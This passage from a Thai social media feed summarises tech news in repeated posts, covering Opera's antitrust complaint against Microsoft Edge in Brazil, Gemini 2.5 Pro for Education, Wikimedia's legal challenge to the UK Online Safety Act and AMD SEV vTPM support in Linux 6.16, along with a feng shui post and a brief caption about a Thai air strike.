    - ใช้เครื่องมือในระบบ เช่น Widgets, Teams, Search และ Outlook เปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้
    - แสดงข้อความรบกวนเมื่อผู้ใช้พยายามดาวน์โหลดเบราว์เซอร์อื่น

    Opera หวังว่าบราซิลจะเป็นตัวอย่างให้ประเทศอื่นดำเนินการตาม และเรียกร้องให้ Microsoft ยุติการใช้กลยุทธ์เหล่านี้ พร้อมเปิดโอกาสให้ผู้ใช้เลือกเบราว์เซอร์ได้อย่างเสรี

    Opera ยื่นคำร้องต่อ CADE ในบราซิล กล่าวหา Microsoft ใช้กลยุทธ์ไม่เป็นธรรมเพื่อผลักดัน Edge
    เป็นการฟ้องร้องในตลาดสำคัญของ Opera ซึ่งมีผู้ใช้จำนวนมาก
    หวังให้บราซิลเป็นแบบอย่างระดับโลกในการควบคุม Big Tech

    Microsoft ถูกกล่าวหาว่าใช้ “manipulative design tactics” และ “dark patterns” ใน Windows
    เช่น การเปิดไฟล์ PDF ผ่าน Edge แม้ผู้ใช้ตั้งค่าเบราว์เซอร์อื่น
    การแสดงข้อความรบกวนเมื่อพยายามดาวน์โหลดเบราว์เซอร์คู่แข่ง

    Opera ระบุว่า Microsoft ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น
    ส่งผลให้เบราว์เซอร์อื่นไม่มีโอกาสถูกติดตั้งล่วงหน้า
    เป็นการปิดกั้นการแข่งขันตั้งแต่ระดับฮาร์ดแวร์

    Opera เรียกร้องให้ CADE สั่งให้ Microsoft ยุติการใช้ dark patterns และเปิดโอกาสให้เบราว์เซอร์อื่นได้ติดตั้งล่วงหน้า
    รวมถึงการยกเลิกข้อกำหนด “S mode” ที่จำกัดการติดตั้งซอฟต์แวร์จากเว็บ
    เพื่อให้ผู้ใช้สามารถเลือกเบราว์เซอร์ได้อย่างอิสระ

    นี่ไม่ใช่ครั้งแรกที่ Opera ฟ้อง Microsoft ด้วยข้อกล่าวหาเรื่องการผูกขาดเบราว์เซอร์
    เคยฟ้องในสหภาพยุโรปเมื่อปี 2007 กรณี Internet Explorer
    และเคยเรียกร้องให้ Edge ถูกจัดเป็น “gatekeeper” ภายใต้กฎหมาย DMA ของ EU แต่ไม่สำเร็จ

    ผู้ใช้ Windows อาจไม่รู้ว่าการตั้งค่าเบราว์เซอร์ของตนถูกละเมิด
    เครื่องมือในระบบเปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้
    ส่งผลให้เกิดความสับสนและลดความไว้วางใจในระบบ

    การใช้ dark patterns อาจบั่นทอนเสรีภาพในการเลือกใช้ซอฟต์แวร์ของผู้บริโภค
    ผู้ใช้ถูกชักจูงโดยไม่รู้ตัวให้ใช้ Edge
    เป็นการลดโอกาสของเบราว์เซอร์คู่แข่งในการแข่งขันอย่างเป็นธรรม

    การให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge อาจละเมิดหลักการการแข่งขันเสรี
    เบราว์เซอร์อื่นถูกกีดกันตั้งแต่ระดับโรงงาน
    ส่งผลให้ผู้ใช้ไม่มีทางเลือกตั้งแต่ซื้อเครื่อง

    หากไม่มีการควบคุม อาจเกิดการผูกขาดในตลาดเบราว์เซอร์โดยไม่รู้ตัว
    ส่งผลต่อความหลากหลายของนวัตกรรมและความเป็นส่วนตัวของผู้ใช้
    อาจต้องพึ่งพาการแทรกแซงจากหน่วยงานกำกับดูแลในหลายประเทศ

    https://www.neowin.net/news/opera-files-complaint-against-microsoft-for-manipulating-customers-into-using-edge/
    🧭 เรื่องเล่าจากเบราว์เซอร์: เมื่อ Opera ลุกขึ้นสู้กับ Edge เพื่อความเป็นธรรมในการแข่งขัน ในเดือนกรกฎาคม 2025 Opera ได้ยื่นคำร้องต่อ CADE (หน่วยงานกำกับดูแลการแข่งขันของบราซิล) โดยกล่าวหาว่า Microsoft ใช้ “กลยุทธ์การออกแบบที่ชักจูง” หรือที่เรียกว่า dark patterns เพื่อผลักดันให้ผู้ใช้ Windows ใช้ Edge เป็นเบราว์เซอร์หลัก ทั้งที่ผู้ใช้ตั้งค่าเบราว์เซอร์อื่นไว้แล้ว Opera ระบุว่า Microsoft: - ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์ (OEMs) เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น - ไม่เปิดโอกาสให้เบราว์เซอร์อื่น เช่น Opera ได้รับการติดตั้งล่วงหน้า - ใช้เครื่องมือในระบบ เช่น Widgets, Teams, Search และ Outlook เปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้ - แสดงข้อความรบกวนเมื่อผู้ใช้พยายามดาวน์โหลดเบราว์เซอร์อื่น Opera หวังว่าบราซิลจะเป็นตัวอย่างให้ประเทศอื่นดำเนินการตาม และเรียกร้องให้ Microsoft ยุติการใช้กลยุทธ์เหล่านี้ พร้อมเปิดโอกาสให้ผู้ใช้เลือกเบราว์เซอร์ได้อย่างเสรี ✅ Opera ยื่นคำร้องต่อ CADE ในบราซิล กล่าวหา Microsoft ใช้กลยุทธ์ไม่เป็นธรรมเพื่อผลักดัน Edge ➡️ เป็นการฟ้องร้องในตลาดสำคัญของ Opera ซึ่งมีผู้ใช้จำนวนมาก ➡️ หวังให้บราซิลเป็นแบบอย่างระดับโลกในการควบคุม Big Tech ✅ Microsoft ถูกกล่าวหาว่าใช้ “manipulative design tactics” และ “dark patterns” ใน Windows ➡️ เช่น การเปิดไฟล์ PDF ผ่าน Edge แม้ผู้ใช้ตั้งค่าเบราว์เซอร์อื่น ➡️ การแสดงข้อความรบกวนเมื่อพยายามดาวน์โหลดเบราว์เซอร์คู่แข่ง ✅ Opera ระบุว่า Microsoft ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น ➡️ ส่งผลให้เบราว์เซอร์อื่นไม่มีโอกาสถูกติดตั้งล่วงหน้า ➡️ เป็นการปิดกั้นการแข่งขันตั้งแต่ระดับฮาร์ดแวร์ ✅ Opera เรียกร้องให้ CADE สั่งให้ Microsoft ยุติการใช้ dark patterns และเปิดโอกาสให้เบราว์เซอร์อื่นได้ติดตั้งล่วงหน้า ➡️ รวมถึงการยกเลิกข้อกำหนด “S mode” ที่จำกัดการติดตั้งซอฟต์แวร์จากเว็บ ➡️ เพื่อให้ผู้ใช้สามารถเลือกเบราว์เซอร์ได้อย่างอิสระ ✅ นี่ไม่ใช่ครั้งแรกที่ Opera ฟ้อง Microsoft ด้วยข้อกล่าวหาเรื่องการผูกขาดเบราว์เซอร์ ➡️ เคยฟ้องในสหภาพยุโรปเมื่อปี 2007 กรณี Internet Explorer ➡️ และเคยเรียกร้องให้ Edge ถูกจัดเป็น “gatekeeper” ภายใต้กฎหมาย DMA ของ EU แต่ไม่สำเร็จ ‼️ ผู้ใช้ Windows อาจไม่รู้ว่าการตั้งค่าเบราว์เซอร์ของตนถูกละเมิด ⛔ เครื่องมือในระบบเปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้ ⛔ ส่งผลให้เกิดความสับสนและลดความไว้วางใจในระบบ ‼️ การใช้ dark patterns อาจบั่นทอนเสรีภาพในการเลือกใช้ซอฟต์แวร์ของผู้บริโภค ⛔ ผู้ใช้ถูกชักจูงโดยไม่รู้ตัวให้ใช้ Edge ⛔ เป็นการลดโอกาสของเบราว์เซอร์คู่แข่งในการแข่งขันอย่างเป็นธรรม ‼️ การให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge อาจละเมิดหลักการการแข่งขันเสรี ⛔ เบราว์เซอร์อื่นถูกกีดกันตั้งแต่ระดับโรงงาน ⛔ ส่งผลให้ผู้ใช้ไม่มีทางเลือกตั้งแต่ซื้อเครื่อง ‼️ หากไม่มีการควบคุม อาจเกิดการผูกขาดในตลาดเบราว์เซอร์โดยไม่รู้ตัว ⛔ ส่งผลต่อความหลากหลายของนวัตกรรมและความเป็นส่วนตัวของผู้ใช้ ⛔ อาจต้องพึ่งพาการแทรกแซงจากหน่วยงานกำกับดูแลในหลายประเทศ https://www.neowin.net/news/opera-files-complaint-against-microsoft-for-manipulating-customers-into-using-edge/
    WWW.NEOWIN.NET
    Opera files complaint against Microsoft for manipulating customers into using Edge
    Opera has filed a complaint against Microsoft Edge, claiming that the Redmond firm uses deceptive tactics to get customers to use its browser.
    0 ความคิดเห็น 0 การแบ่งปัน 133 มุมมอง 0 รีวิว
  • เรื่องเล่าจากห้องเรียนแห่งอนาคต: Gemini 2.5 Pro กับภารกิจปฏิวัติการศึกษา

    ในเดือนกรกฎาคม 2025 Google ได้ประกาศเพิ่มขีดจำกัดการใช้งานของโมเดล AI ขั้นสูง Gemini 2.5 Pro ให้กับผู้ใช้ในโครงการ “Gemini for Education” โดยไม่คิดค่าใช้จ่าย ซึ่งรวมถึงนักเรียน นักศึกษา และคณาจารย์ในหลายประเทศ เช่น สหรัฐฯ อินเดีย และอีกหลายประเทศที่กำลังพัฒนา

    Gemini 2.5 Pro ได้รับการปรับแต่งด้วย LearnLM ซึ่งเป็นโมเดล AI ที่ออกแบบมาโดยเฉพาะเพื่อการเรียนรู้ โดยอิงจากหลักการของ “learning science” เช่น การลดภาระทางความคิด, การส่งเสริมการเรียนรู้เชิงรุก, และการปรับเนื้อหาให้เหมาะกับผู้เรียนแต่ละคน

    ผลการประเมินจากผู้เชี่ยวชาญด้านการสอนกว่า 200 คน พบว่า Gemini 2.5 Pro ได้รับคะแนนสูงสุดในทุกหมวดหมู่เมื่อเทียบกับโมเดลอื่น เช่น GPT-4o และ Claude 3.7 Sonnet โดยเฉพาะในด้านการสนับสนุนเป้าหมายการเรียนรู้และการอธิบายเนื้อหาอย่างมีเหตุผล

    Google เพิ่มขีดจำกัดการใช้งาน Gemini 2.5 Pro ให้กับผู้ใช้ในโครงการ Gemini for Education โดยไม่คิดค่าใช้จ่าย
    ครอบคลุมนักเรียนและคณาจารย์ในหลายประเทศ เช่น สหรัฐฯ อินเดีย บราซิล ญี่ปุ่น และอินโดนีเซีย
    เป็นส่วนหนึ่งของ Google Workspace for Education

    Gemini 2.5 Pro ได้รับการปรับแต่งด้วย LearnLM ซึ่งเป็นโมเดล AI ที่ออกแบบมาเพื่อการเรียนรู้โดยเฉพาะ
    อิงจากหลักการ learning science เช่น การลด cognitive load และการปรับเนื้อหาให้เหมาะกับผู้เรียน
    ได้รับการยอมรับจากผู้เชี่ยวชาญด้านการสอนว่าเป็นโมเดลที่ดีที่สุดสำหรับการเรียนรู้

    ผลการประเมินจาก “Arena for Learning” พบว่า Gemini 2.5 Pro ได้รับความนิยมสูงสุดจากผู้เชี่ยวชาญ
    ได้รับการเลือกใน 73.2% ของการเปรียบเทียบแบบ blind test กับโมเดลอื่น
    เหนือกว่า GPT-4o และ Claude 3.7 ในทุกหลักการของ pedagogy

    Google ยังมอบสิทธิ์ใช้งาน Colab Pro ฟรี 1 ปีให้กับนักศึกษาและคณาจารย์ในสหรัฐฯ
    เพื่อสนับสนุนการวิเคราะห์ข้อมูลและการฝึกโมเดล AI สำหรับงานวิจัย
    เป็นส่วนหนึ่งของกลยุทธ์สร้างความผูกพันระยะยาวกับผู้ใช้ในภาคการศึกษา

    Gemini for Education มาพร้อมการปกป้องข้อมูลระดับองค์กร
    ข้อมูลการใช้งานจะไม่ถูกตรวจสอบโดยมนุษย์หรือใช้ฝึกโมเดล AI
    มีระบบควบคุมการใช้งานโดยผู้ดูแลระบบของสถาบัน

    https://www.neowin.net/news/gemini-for-education-now-offers-significantly-higher-usage-limits-to-gemini-25-pro-model/
    🎓 เรื่องเล่าจากห้องเรียนแห่งอนาคต: Gemini 2.5 Pro กับภารกิจปฏิวัติการศึกษา ในเดือนกรกฎาคม 2025 Google ได้ประกาศเพิ่มขีดจำกัดการใช้งานของโมเดล AI ขั้นสูง Gemini 2.5 Pro ให้กับผู้ใช้ในโครงการ “Gemini for Education” โดยไม่คิดค่าใช้จ่าย ซึ่งรวมถึงนักเรียน นักศึกษา และคณาจารย์ในหลายประเทศ เช่น สหรัฐฯ อินเดีย และอีกหลายประเทศที่กำลังพัฒนา Gemini 2.5 Pro ได้รับการปรับแต่งด้วย LearnLM ซึ่งเป็นโมเดล AI ที่ออกแบบมาโดยเฉพาะเพื่อการเรียนรู้ โดยอิงจากหลักการของ “learning science” เช่น การลดภาระทางความคิด, การส่งเสริมการเรียนรู้เชิงรุก, และการปรับเนื้อหาให้เหมาะกับผู้เรียนแต่ละคน ผลการประเมินจากผู้เชี่ยวชาญด้านการสอนกว่า 200 คน พบว่า Gemini 2.5 Pro ได้รับคะแนนสูงสุดในทุกหมวดหมู่เมื่อเทียบกับโมเดลอื่น เช่น GPT-4o และ Claude 3.7 Sonnet โดยเฉพาะในด้านการสนับสนุนเป้าหมายการเรียนรู้และการอธิบายเนื้อหาอย่างมีเหตุผล ✅ Google เพิ่มขีดจำกัดการใช้งาน Gemini 2.5 Pro ให้กับผู้ใช้ในโครงการ Gemini for Education โดยไม่คิดค่าใช้จ่าย ➡️ ครอบคลุมนักเรียนและคณาจารย์ในหลายประเทศ เช่น สหรัฐฯ อินเดีย บราซิล ญี่ปุ่น และอินโดนีเซีย ➡️ เป็นส่วนหนึ่งของ Google Workspace for Education ✅ Gemini 2.5 Pro ได้รับการปรับแต่งด้วย LearnLM ซึ่งเป็นโมเดล AI ที่ออกแบบมาเพื่อการเรียนรู้โดยเฉพาะ ➡️ อิงจากหลักการ learning science เช่น การลด cognitive load และการปรับเนื้อหาให้เหมาะกับผู้เรียน ➡️ ได้รับการยอมรับจากผู้เชี่ยวชาญด้านการสอนว่าเป็นโมเดลที่ดีที่สุดสำหรับการเรียนรู้ ✅ ผลการประเมินจาก “Arena for Learning” พบว่า Gemini 2.5 Pro ได้รับความนิยมสูงสุดจากผู้เชี่ยวชาญ ➡️ ได้รับการเลือกใน 73.2% ของการเปรียบเทียบแบบ blind test กับโมเดลอื่น ➡️ เหนือกว่า GPT-4o และ Claude 3.7 ในทุกหลักการของ pedagogy ✅ Google ยังมอบสิทธิ์ใช้งาน Colab Pro ฟรี 1 ปีให้กับนักศึกษาและคณาจารย์ในสหรัฐฯ ➡️ เพื่อสนับสนุนการวิเคราะห์ข้อมูลและการฝึกโมเดล AI สำหรับงานวิจัย ➡️ เป็นส่วนหนึ่งของกลยุทธ์สร้างความผูกพันระยะยาวกับผู้ใช้ในภาคการศึกษา ✅ Gemini for Education มาพร้อมการปกป้องข้อมูลระดับองค์กร ➡️ ข้อมูลการใช้งานจะไม่ถูกตรวจสอบโดยมนุษย์หรือใช้ฝึกโมเดล AI ➡️ มีระบบควบคุมการใช้งานโดยผู้ดูแลระบบของสถาบัน https://www.neowin.net/news/gemini-for-education-now-offers-significantly-higher-usage-limits-to-gemini-25-pro-model/
    WWW.NEOWIN.NET
    Gemini for Education now offers significantly higher usage limits to Gemini 2.5 Pro model
    Google is improving its Gemini for Education platform by providing free, significantly expanded access to its powerful Gemini 2.5 Pro AI model.
    0 ความคิดเห็น 0 การแบ่งปัน 150 มุมมอง 0 รีวิว
  • FENGSHUI DAILY
    อัพเดตทุกวัน ที่นี่ที่เดียว
    สีเสริมดวง เสริมความเฮง
    ทิศมงคล เวลามงคล
    อย่าลืมดูกัน เมื่อเริ่มวันใหม่
    วันพฤหัสบดีที่ 31 เดือนกรกฎาคม พ.ศ.2568
    ___________________________________
    FengshuiBizDesigner
    ฮวงจุ้ย...ออกแบบได้
    FENGSHUI DAILY อัพเดตทุกวัน ที่นี่ที่เดียว สีเสริมดวง เสริมความเฮง ทิศมงคล เวลามงคล อย่าลืมดูกัน เมื่อเริ่มวันใหม่ วันพฤหัสบดีที่ 31 เดือนกรกฎาคม พ.ศ.2568 ___________________________________ FengshuiBizDesigner ฮวงจุ้ย...ออกแบบได้
    0 ความคิดเห็น 0 การแบ่งปัน 49 มุมมอง 0 รีวิว
  • เรื่องเล่าจากสารานุกรมเสรี: เมื่อกฎหมายความปลอดภัยออนไลน์กลายเป็นภัยต่อผู้สร้างความรู้

    ในเดือนกรกฎาคม 2025 Wikimedia Foundation ซึ่งเป็นองค์กรไม่แสวงหากำไรที่ดูแล Wikipedia ได้ยื่นฟ้องรัฐบาลสหราชอาณาจักรต่อศาลสูงแห่งลอนดอน โดยมุ่งเป้าไปที่ “Categorisation Regulations” ของกฎหมาย Online Safety Act (OSA) ซึ่งอาจจัดให้ Wikipedia เป็น “Category 1 service”—กลุ่มเว็บไซต์ที่มีข้อบังคับเข้มงวดที่สุด

    หาก Wikipedia ถูกจัดอยู่ในหมวดนี้ จะต้องตรวจสอบตัวตนของอาสาสมัครที่แก้ไขบทความ ซึ่งขัดกับหลักการพื้นฐานของ Wikipedia ที่เน้นการเปิดกว้างและไม่เก็บข้อมูลส่วนตัวของผู้ใช้ การบังคับให้เปิดเผยตัวตนอาจทำให้อาสาสมัครเสี่ยงต่อการถูกตามรอย, ฟ้องร้อง, หรือแม้แต่ถูกคุมขังในบางประเทศ

    Wikimedia ยืนยันว่า Wikipedia ไม่ควรถูกจัดอยู่ในกลุ่มเดียวกับแพลตฟอร์มเชิงพาณิชย์อย่าง Facebook หรือ TikTok เพราะไม่มีโฆษณา, ไม่ขายข้อมูล, และดำเนินงานโดยอาสาสมัครกว่า 260,000 คนทั่วโลก

    Wikimedia Foundation ยื่นฟ้องรัฐบาลสหราชอาณาจักรต่อศาลสูงในเดือนกรกฎาคม 2025
    มุ่งเป้าไปที่ Categorisation Regulations ของกฎหมาย Online Safety Act
    เป็นการฟ้องเฉพาะข้อกำหนด ไม่ใช่ตัวกฎหมายทั้งหมด

    Wikipedia อาจถูกจัดเป็น Category 1 service ซึ่งมีข้อบังคับเข้มงวดที่สุด
    ต้องตรวจสอบตัวตนของผู้ใช้และอาสาสมัคร
    ต้องปฏิบัติตามข้อกำหนดด้านความปลอดภัยและการรายงาน

    Wikimedia เตือนว่าข้อกำหนดเหล่านี้จะกระทบต่อความปลอดภัยของอาสาสมัคร
    เสี่ยงต่อการถูกละเมิดข้อมูล, ถูกตามรอย, หรือถูกดำเนินคดี
    อาจทำให้อาสาสมัครจำนวนมากเลิกแก้ไขบทความ

    Wikipedia มีผู้เข้าชมกว่า 15 พันล้านครั้งต่อเดือนทั่วโลก และ 776 ล้านครั้งในสหราชอาณาจักร
    มีอาสาสมัครในสหราชอาณาจักรหลายพันคน
    เป็นแหล่งเรียนรู้สำคัญในระบบการศึกษาของประเทศ เช่น Wikipedia ภาษาเวลส์

    ผู้ร่วมฟ้องคืออาสาสมัครในสหราชอาณาจักรที่ใช้นามแฝงว่า “Zzuuzz”
    เพื่อแสดงให้เห็นถึงผลกระทบต่อผู้ใช้งานจริง
    เป็นคดีแรกที่มีอาสาสมัคร Wikipedia เข้าร่วมเป็นผู้ฟ้องร่วม

    Wikimedia เรียกร้องให้ศาลตั้งบรรทัดฐานใหม่ในการคุ้มครองโครงการสาธารณะบนอินเทอร์เน็ต
    Wikipedia เป็นเว็บไซต์ระดับโลกที่ดำเนินงานโดยไม่แสวงหากำไร
    เป็นแหล่งข้อมูลสำคัญที่ใช้ฝึกโมเดล AI และส่งเสริมการรู้เท่าทันสื่อ

    https://wikimediafoundation.org/news/2025/07/17/wikimedia-foundation-challenges-uk-online-safety-act-regulations/
    🧠 เรื่องเล่าจากสารานุกรมเสรี: เมื่อกฎหมายความปลอดภัยออนไลน์กลายเป็นภัยต่อผู้สร้างความรู้ ในเดือนกรกฎาคม 2025 Wikimedia Foundation ซึ่งเป็นองค์กรไม่แสวงหากำไรที่ดูแล Wikipedia ได้ยื่นฟ้องรัฐบาลสหราชอาณาจักรต่อศาลสูงแห่งลอนดอน โดยมุ่งเป้าไปที่ “Categorisation Regulations” ของกฎหมาย Online Safety Act (OSA) ซึ่งอาจจัดให้ Wikipedia เป็น “Category 1 service”—กลุ่มเว็บไซต์ที่มีข้อบังคับเข้มงวดที่สุด หาก Wikipedia ถูกจัดอยู่ในหมวดนี้ จะต้องตรวจสอบตัวตนของอาสาสมัครที่แก้ไขบทความ ซึ่งขัดกับหลักการพื้นฐานของ Wikipedia ที่เน้นการเปิดกว้างและไม่เก็บข้อมูลส่วนตัวของผู้ใช้ การบังคับให้เปิดเผยตัวตนอาจทำให้อาสาสมัครเสี่ยงต่อการถูกตามรอย, ฟ้องร้อง, หรือแม้แต่ถูกคุมขังในบางประเทศ Wikimedia ยืนยันว่า Wikipedia ไม่ควรถูกจัดอยู่ในกลุ่มเดียวกับแพลตฟอร์มเชิงพาณิชย์อย่าง Facebook หรือ TikTok เพราะไม่มีโฆษณา, ไม่ขายข้อมูล, และดำเนินงานโดยอาสาสมัครกว่า 260,000 คนทั่วโลก ✅ Wikimedia Foundation ยื่นฟ้องรัฐบาลสหราชอาณาจักรต่อศาลสูงในเดือนกรกฎาคม 2025 ➡️ มุ่งเป้าไปที่ Categorisation Regulations ของกฎหมาย Online Safety Act ➡️ เป็นการฟ้องเฉพาะข้อกำหนด ไม่ใช่ตัวกฎหมายทั้งหมด ✅ Wikipedia อาจถูกจัดเป็น Category 1 service ซึ่งมีข้อบังคับเข้มงวดที่สุด ➡️ ต้องตรวจสอบตัวตนของผู้ใช้และอาสาสมัคร ➡️ ต้องปฏิบัติตามข้อกำหนดด้านความปลอดภัยและการรายงาน ✅ Wikimedia เตือนว่าข้อกำหนดเหล่านี้จะกระทบต่อความปลอดภัยของอาสาสมัคร ➡️ เสี่ยงต่อการถูกละเมิดข้อมูล, ถูกตามรอย, หรือถูกดำเนินคดี ➡️ อาจทำให้อาสาสมัครจำนวนมากเลิกแก้ไขบทความ ✅ Wikipedia มีผู้เข้าชมกว่า 15 พันล้านครั้งต่อเดือนทั่วโลก และ 776 ล้านครั้งในสหราชอาณาจักร ➡️ มีอาสาสมัครในสหราชอาณาจักรหลายพันคน ➡️ เป็นแหล่งเรียนรู้สำคัญในระบบการศึกษาของประเทศ เช่น Wikipedia ภาษาเวลส์ ✅ ผู้ร่วมฟ้องคืออาสาสมัครในสหราชอาณาจักรที่ใช้นามแฝงว่า “Zzuuzz” ➡️ เพื่อแสดงให้เห็นถึงผลกระทบต่อผู้ใช้งานจริง ➡️ เป็นคดีแรกที่มีอาสาสมัคร Wikipedia เข้าร่วมเป็นผู้ฟ้องร่วม ✅ Wikimedia เรียกร้องให้ศาลตั้งบรรทัดฐานใหม่ในการคุ้มครองโครงการสาธารณะบนอินเทอร์เน็ต ➡️ Wikipedia เป็นเว็บไซต์ระดับโลกที่ดำเนินงานโดยไม่แสวงหากำไร ➡️ เป็นแหล่งข้อมูลสำคัญที่ใช้ฝึกโมเดล AI และส่งเสริมการรู้เท่าทันสื่อ https://wikimediafoundation.org/news/2025/07/17/wikimedia-foundation-challenges-uk-online-safety-act-regulations/
    WIKIMEDIAFOUNDATION.ORG
    Wikimedia Foundation Challenges UK Online Safety Act Regulations – Wikimedia Foundation
    Next week, on 22 and 23 July 2025, the High Court of Justice in London will hear the Wikimedia Foundation's legal challenge to the Categorisation Regulations of the United Kingdom (UK)'s Online Safety Act (OSA).
    0 ความคิดเห็น 0 การแบ่งปัน 114 มุมมอง 0 รีวิว
  • ช่วงเวลาที่เครื่องบินรบของกองทัพอากาศไทยทิ้งระเบิดใส่ฐานที่มั่นของกัมพูชา เหตุการณ์เมื่อวันที่ 28 กรกฎาคม 2568
    ช่วงเวลาที่เครื่องบินรบของกองทัพอากาศไทยทิ้งระเบิดใส่ฐานที่มั่นของกัมพูชา เหตุการณ์เมื่อวันที่ 28 กรกฎาคม 2568
    0 ความคิดเห็น 0 การแบ่งปัน 179 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากเคอร์เนล: เมื่อ Linux กลายเป็นแพลตฟอร์มที่ปลอดภัยที่สุดสำหรับงานลับสุดยอด

    ในเดือนกรกฎาคม 2025 Linux Kernel 6.16 ได้เพิ่มการรองรับ AMD SEV vTPM อย่างสมบูรณ์ ซึ่งเป็นการรวมเทคโนโลยี Secure Encrypted Virtualization (SEV) และ Virtual Trusted Platform Module (vTPM) เข้าด้วยกัน เพื่อสร้างสภาพแวดล้อมการทำงานที่ปลอดภัยและแยกออกจากระบบโฮสต์โดยสิ้นเชิง

    vTPM คือ TPM แบบเสมือนที่ทำงานภายใน VM โดยถูกเข้ารหัสและแยกออกจาก hypervisor ด้วยเทคโนโลยี SEV-SNP ของ AMD ทำให้สามารถใช้ฟีเจอร์อย่าง Secure Boot, Measured Boot และ Remote Attestation ได้อย่างปลอดภัยในระบบคลาวด์หรือองค์กรที่ต้องการความมั่นคงสูง

    ฟีเจอร์นี้เหมาะกับองค์กรในภาคการเงิน, สาธารณสุข, และภาครัฐ ที่ต้องการความมั่นใจว่าข้อมูลสำคัญจะไม่ถูกเข้าถึงโดยผู้ให้บริการคลาวด์หรือระบบโฮสต์ที่ไม่ไว้วางใจ

    Linux Kernel 6.16 เพิ่มการรองรับ AMD SEV vTPM อย่างสมบูรณ์
    รองรับการสร้าง vTPM ภายใน VM ที่ถูกเข้ารหัสด้วย SEV-SNP
    ใช้โปรโตคอลจาก AMD SVSM spec เพื่อให้ guest OS ติดต่อกับ vTPM ได้

    vTPM ทำงานในหน่วยความจำที่ถูกแยกและเข้ารหัสโดยฮาร์ดแวร์
    ป้องกันการเข้าถึงจาก hypervisor และ guest OS
    รองรับ TPM 2.0 เต็มรูปแบบ เช่น PCRs และการเข้ารหัสคีย์

    รองรับการตรวจสอบความน่าเชื่อถือของระบบ (attestation) และ Secure Boot
    เหมาะกับการใช้งานใน Zero Trust Architecture
    ช่วยให้มั่นใจว่า VM ทำงานในสภาพแวดล้อมที่ปลอดภัยจริง

    เหมาะกับองค์กรที่ต้องการความปลอดภัยระดับสูง เช่น การเงิน, สาธารณสุข, และภาครัฐ
    รองรับการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและการเข้ารหัส
    ลดการพึ่งพาเฟิร์มแวร์หรือ TPM แบบ proprietary

    สามารถใช้งานร่วมกับ hypervisor อย่าง KVM และเครื่องมือจัดการ VM บน Linux
    รองรับการตั้งค่า kernel เช่น CONFIG_TCG_SVSM=y
    มีเครื่องมือสำหรับตรวจสอบสถานะการเข้ารหัสและการทำงานของ vTPM

    การใช้งาน vTPM ต้องมีการตั้งค่าฮาร์ดแวร์และ BIOS ที่รองรับ SEV-SNP
    หาก CPU หรือ BIOS ไม่รองรับ จะไม่สามารถเปิดใช้งานฟีเจอร์นี้ได้
    ต้องตรวจสอบว่าเปิดใช้งาน Secure Memory Encryption แล้ว

    การเข้ารหัสและการตรวจสอบแบบฮาร์ดแวร์อาจเพิ่มภาระการประมวลผล
    มี overhead ด้านประสิทธิภาพ โดยเฉพาะใน workload ที่ใช้ vTPM หนัก
    ต้องวางแผนการจัดสรรทรัพยากรอย่างรอบคอบ

    การตั้งค่า kernel และการคอมไพล์ต้องแม่นยำเพื่อให้ vTPM ทำงานได้สมบูรณ์
    ต้องเปิดใช้งานโมดูลที่เกี่ยวข้อง เช่น CONFIG_KVM_AMD_SEV
    หากตั้งค่าผิด อาจทำให้ VM ไม่สามารถบูตหรือใช้งาน vTPM ได้

    การตรวจสอบความน่าเชื่อถือ (attestation) ต้องใช้เครื่องมือเฉพาะและการทดสอบอย่างละเอียด
    ต้องใช้ AMD SEV tools และ kernel boot parameters เช่น amd_sev.debug=1
    หากไม่ตรวจสอบอย่างถูกต้อง อาจเกิดช่องโหว่ด้านความปลอดภัย

    https://linuxconfig.org/comprehensive-amd-sev-vtpm-support-in-linux-kernel-6-16-enhances-confidential-computing
    🔐 เรื่องเล่าจากเคอร์เนล: เมื่อ Linux กลายเป็นแพลตฟอร์มที่ปลอดภัยที่สุดสำหรับงานลับสุดยอด ในเดือนกรกฎาคม 2025 Linux Kernel 6.16 ได้เพิ่มการรองรับ AMD SEV vTPM อย่างสมบูรณ์ ซึ่งเป็นการรวมเทคโนโลยี Secure Encrypted Virtualization (SEV) และ Virtual Trusted Platform Module (vTPM) เข้าด้วยกัน เพื่อสร้างสภาพแวดล้อมการทำงานที่ปลอดภัยและแยกออกจากระบบโฮสต์โดยสิ้นเชิง vTPM คือ TPM แบบเสมือนที่ทำงานภายใน VM โดยถูกเข้ารหัสและแยกออกจาก hypervisor ด้วยเทคโนโลยี SEV-SNP ของ AMD ทำให้สามารถใช้ฟีเจอร์อย่าง Secure Boot, Measured Boot และ Remote Attestation ได้อย่างปลอดภัยในระบบคลาวด์หรือองค์กรที่ต้องการความมั่นคงสูง ฟีเจอร์นี้เหมาะกับองค์กรในภาคการเงิน, สาธารณสุข, และภาครัฐ ที่ต้องการความมั่นใจว่าข้อมูลสำคัญจะไม่ถูกเข้าถึงโดยผู้ให้บริการคลาวด์หรือระบบโฮสต์ที่ไม่ไว้วางใจ ✅ Linux Kernel 6.16 เพิ่มการรองรับ AMD SEV vTPM อย่างสมบูรณ์ ➡️ รองรับการสร้าง vTPM ภายใน VM ที่ถูกเข้ารหัสด้วย SEV-SNP ➡️ ใช้โปรโตคอลจาก AMD SVSM spec เพื่อให้ guest OS ติดต่อกับ vTPM ได้ ✅ vTPM ทำงานในหน่วยความจำที่ถูกแยกและเข้ารหัสโดยฮาร์ดแวร์ ➡️ ป้องกันการเข้าถึงจาก hypervisor และ guest OS ➡️ รองรับ TPM 2.0 เต็มรูปแบบ เช่น PCRs และการเข้ารหัสคีย์ ✅ รองรับการตรวจสอบความน่าเชื่อถือของระบบ (attestation) และ Secure Boot ➡️ เหมาะกับการใช้งานใน Zero Trust Architecture ➡️ ช่วยให้มั่นใจว่า VM 